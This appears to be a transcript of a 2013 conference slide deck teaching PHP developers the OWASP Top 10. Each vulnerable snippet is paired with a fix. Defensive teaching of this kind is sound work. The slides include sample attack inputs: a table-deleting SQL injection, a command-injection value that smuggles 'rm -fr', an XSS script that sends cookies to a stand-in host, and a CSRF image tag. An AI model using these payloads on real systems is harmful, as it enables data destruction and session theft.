OWASP TOP 10 for PHP Programmers

10,083 views

Published on

Presented at #PHPLX 11 September 2013

The 2013 edition of OWASP (Open Web Application Security Project) top 10 has just been released and unfortunately Injections (not only SQL injection) is still the most common security problem. In this talk we will review the top 10 list of security problems looking at possible attack scenarios and ways to protect against them mostly from a PHP programmer perspective.

Published in: Technology

OWASP TOP 10 for PHP Programmers

  1. 1. Follow this topic: @rjsmelo, #owasp, #php, #appsec OWASP TOP 10 for PHP programmers RICARDO MELO Presented at #PHPLX – 11 September 2013
  2. 2. @rjsmelo 2 RICARDO MELO ● CTO @ DRI ● PHP, Mysql, Linux and lots of other OSS ● ZCE, RHCE, LPI 3, ITIL, etc ● +10 years building (and breaking) things
  3. 3. @rjsmelo 3 About ● 14 Year old academic spin-off ● Pragmatic OSS Orientation ● PHP, Mysql, SugarCRM, Drupal, JavaScript, Linux, etc. ● Crafters, Integrators ● Always looking for software developers – Yes, right now!
  4. 4. 1999 - 2013 DRI. Some Rights Reserved . 4 Outline ● OWASP ● OWASP TOP 10 ● What's Next ● Conclusions
  5. 5. 1999 - 2013 DRI. Some Rights Reserved . 5 What is OWASP? ● Open Web Application Security Project ● World wide non-for-profit ● Focus on security improvement and awareness ● Very active community ● Lots of projects (you can start yours)
  6. 6. 1999 - 2013 DRI. Some Rights Reserved . 6 What is OWASP TOP 10 ● The name is “The Top 10 Most Critical Web Application Risks” ● The focus is awareness ● Released 2003, 2004, 2007, 2010 and 2013 https://www.owasp.org/index.php/Top_10_2013
  7. 7. 1999 - 2013 DRI. Some Rights Reserved . 7 Risk ? Thread Agent Attack Vectors Weakness Prevalence Weakness Detectability Technical Impacts Business Impacts Application Specific EASY WIDESPREAD EASY SEVERE Application / Business Specific AVERAGE COMMON AVERAGE MODERATE DIFFICULT UNCOMMON DIFFICULT MINOR
  8. 8. 1999 - 2013 DRI. Some Rights Reserved . 8 OWASP TOP 10 - 2013 ● A1 – Injection ● A2 – Broken Authentication and Session Management ● A3 – Cross-site Scripting (XSS) ● A4 – Insecure Direct Object References ● A5 – Security Misconfiguration ● A6 – Sensitive Data Exposure ● A7 – Missing Function Level Access Control ● A8 – Cross Site Request Forgery (CSRF) ● A9 – Using Components with Known Vulnerabilities ● A10 – Unvalidated Redirects and Forwards
  9. 9. 1999 - 2013 DRI. Some Rights Reserved . 9 A1 - Injection ● Occurs when untrusted data is sent directly to the interpreter! ● Not only SQL: NoSQL, Ldap, OS, XML, Xpath! ● Never, NEVER trust ANY input!
  10. 10. 1999 - 2013 DRI. Some Rights Reserved . 10 A1 – Injection Examples - SQL <?php // prune to sql injection // script.php?start_record=20 $db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password'); $stmt = $db->query( "SELECT * FROM some_table limit " . $_REQUEST['start_record'] . ",10"); $result = $stmt->fetchAll(PDO::FETCH_ASSOC); echo function_to_render_result($result); // what if I set record = "1; delete from some_table; -- " <?php // script.php?start_record=20 $db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password'); $stmt = $db->prepare("SELECT * FROM some_table limit ?,10"); $stmt->execute(array($_REQUEST['start_record'])); $result = $stmt->fetchAll(PDO::FETCH_ASSOC); echo function_to_render_result($result);
  11. 11. 1999 - 2013 DRI. Some Rights Reserved . 11 A1 - Injection Samples - OS <?php // script.php?file=xpto.pdf $fileType = exec( "file " . $_REQUEST['file']); echo $fileType; // but one can try with "xpto.pdf; rm -fr /some/folder" <?php // script.php?file=xpto.pdf $fileType = exec( "file " . escapeshellarg($_REQUEST['file'])); echo $fileType;
  12. 12. 1999 - 2013 DRI. Some Rights Reserved . 12 A2 – Broken Authentication and Session Management ● Broken implementations allowing attacker to assume “other” user's identity! ● Can be session hijack/fixation ● Broken authentication ● Or other fails that lead to compromise passwords / keys / session tokens
  13. 13. 1999 - 2013 DRI. Some Rights Reserved . 13 A2 – Session Fixation <?php // Prune to session fixation // [ ... ] $userDetails = check_credentials($username, $password); if ( $userDetails !== false ) { $_SESSION['userIsLoggedin'] = true; $_SESSION['userInformation'] = $userDetails; } // [ ... ] <?php // [ ... ] $userDetails = check_credentials($username, $password); if ( $userDetails !== false ) { session_regenerate_id(); $_SESSION['userIsLoggedin'] = true; $_SESSION['userInformation'] = $userDetails; } // [ ... ]
  14. 14. 1999 - 2013 DRI. Some Rights Reserved . 14 A3 – Cross-Site Scripting (XSS) ● Whenever untrusted data is sent to the browser without proper validation and escaping! ● XSS allows the attacker to OWN the victims browser and do ... everything! ● Stored, Reflected and DOM based XSS
  15. 15. 1999 - 2013 DRI. Some Rights Reserved . 15 A3 – steal user cookie <?php // page prune to XSS // script.php?search=hello $results = some_search_function($_REQUEST['search']); ?> <html> <body> <p>results for : <?= $_REQUEST['search']; ?> <?= render_results($results); ?> </body> </html> // set search to: "<script>document.location='http://www.example.com/precious_cookie ?cookie='+document.cookie</script>" <?php // page prune to XSS // script.php?search=hello $results = some_search_function($_REQUEST['search']); ?> <html> <body> <p>results for : <?= htmlentities($_REQUEST['search'],ENT_COMPAT|ENT_HTML401,'UTF-8'); ?> <?= render_results($results); ?> </body> </html>
  16. 16. 1999 - 2013 DRI. Some Rights Reserved . 16 A4 – Insecure Direct Object Reference ● Whenever developer exposes references to internal objects and don't have proper access control. ● Attackers can change the references and access resources that shouldn't be accessible.
  17. 17. 1999 - 2013 DRI. Some Rights Reserved . 17 A4 – Access other user account <?php // prune to insecure direct reference // script.php?account=10 $accountId = intval($_REQUEST['account']); $account = new Account($accountId); echo render_account_info($account); // and if I change account to "9" ? <?php // script.php?account=10 $user = new User($_SESSION['userInfo']); $accountId = intval($_REQUEST['account']); $account = new Account($accountId); if ( $account->canRead($user)) { echo render_account_info($account); } else { echo "Access denied"; }
  18. 18. 1999 - 2013 DRI. Some Rights Reserved . 18 A5 – Security Misconfiguration ● Often fails in securing the full stack leads to application / servers being compromised. ● Take into consideration other services / applications running in the same infrastructure ● Watch out for outdated software ● Watch out for default accounts
  19. 19. 1999 - 2013 DRI. Some Rights Reserved . 19 A6 – Sensitive Data Exposure ● Whenever sensitive data isn't properly protected allowing attackers to steal or modify that information. ● Credit Card fraud, Identity theft, etc! ● Be aware, data should be protected both in transit or on the storage engine (don't forget the backups)
  20. 20. 1999 - 2013 DRI. Some Rights Reserved . 20 A7 – Missing Function Level Access Control ● Most applications validate function based access control before displaying options in UI, but fail to validate when the function is accessed. ● Attacker can forge request to functions that shouldn't be available
  21. 21. 1999 - 2013 DRI. Some Rights Reserved . 21 A7 – insecure function <?php // prune to insecure function access // script.php?user=john&action=read $userId = $_REQUEST['user']; $action = $_REQUEST['action']; $user = new User($userId); switch($action) { case 'read': echo render_user($user); break; case 'delete': $user->delete(); echo "user Deleted"; break; } // and if I change action to "delete"? <?php $userId = $_REQUEST['user']; $action = $_REQUEST['action']; $loggedUser = new AppUser($_SESSION['userInfo']); $user = new User($userId); switch($action) { case 'read': if ( $user->canRead($loggedUser) ){ echo render_user($user); } break; case 'delete': if ( $user->canDelete($loggedUser) ){ $user->delete(); echo "user Deleted"; } break; }
  22. 22. 1999 - 2013 DRI. Some Rights Reserved . 22 A8 – Cross Site Request Forgery (CSRF) ● CSRF forces a victim's browser to send a forged HTTP request to a vulnerable web application (normally taking advantage of an existing user session) ● No difference from user generated requests!
  23. 23. 1999 - 2013 DRI. Some Rights Reserved . 23 A8 – delete user <?php // vulnerable app // delete.php?id=123 $id = intval($_REQUEST['id']); $user = new User($id); $loggedUser = new AppUser($_SESSION['userInfo']); if ( $user->canDelete($loggedUser) ){ $user->delete(); } ?> // attackers site: <img src="http://www.example.com/users/delete.php?id=123" /> <?php // vulnerable app $id = intval($_REQUEST['id']); $user = new User($id); $loggedUser = new AppUser($_SESSION['userInfo']); if (validate_token($_REQUEST['token'])) { if ( $user->canDelete($loggedUser) ){ $user->delete(); } }
  24. 24. 1999 - 2013 DRI. Some Rights Reserved . 24 A9 – Using Components with know Vulnerabilities ● Whenever you use libraries, frameworks, or other software modules with known vulnerabilities. ● Attackers can leverage this issues to attack your application / server / etc.
  25. 25. 1999 - 2013 DRI. Some Rights Reserved . 25 A10 – Unvalidated Redirects and Forwards ● Web application often redirects users to other pages, using untrusted data to determine the destination pages. ● Atackers can redirect victims to phishing or malware pages or use forwards to access unauthorized pages.
  26. 26. 1999 - 2013 DRI. Some Rights Reserved . 26 A10 – “simple” Forward <?php class someController extends baseController { public function preFunction($args,$action) { $this->checkAccess($args, $action); } public function indexAction($args) { // [...] do something here if ( $args['callback'] && method_exists($this,$args['callback'])){ unset($args['callback']); call_user_func_array(array($this,$args['callback']),$args); } return $response; } public function destroyAction($args) { $this->selfTerminate(); } } if ( $args['callback'] && method_exists($this,$args['callback'])){ $this->preFunction($args,$args['callback']); unset($args['callback']); call_user_func_array(array($this,$args['callback']),$args); }
  27. 27. 1999 - 2013 DRI. Some Rights Reserved . 27 What's Next For PHP Programmers ● OWASP – http://goo.gl/lVRRY ● Cheat Sheets – http://goo.gl/lVRRY ● OWASP Zed Attack Proxy – http://goo.gl/QE5v1H ● OWASP Books – free – http://goo.gl/aLx1q2
  28. 28. 1999 - 2013 DRI. Some Rights Reserved . 28 Conclusions ● Keep the application secure is a continuous process ● Avoiding the TOP 10 Risks don't make your application secure, but is already a HUGE step forward. ● Don't trust ANY input! Escape every output!
  29. 29. Thank you
  30. 30. Follow this topic: @rjsmelo, #owasp, #php, #appsec QA Feedback: https://joind.in/9107
  31. 31. www.dri-global.com @rjsmelo ricardo.melo@dri-global.com

×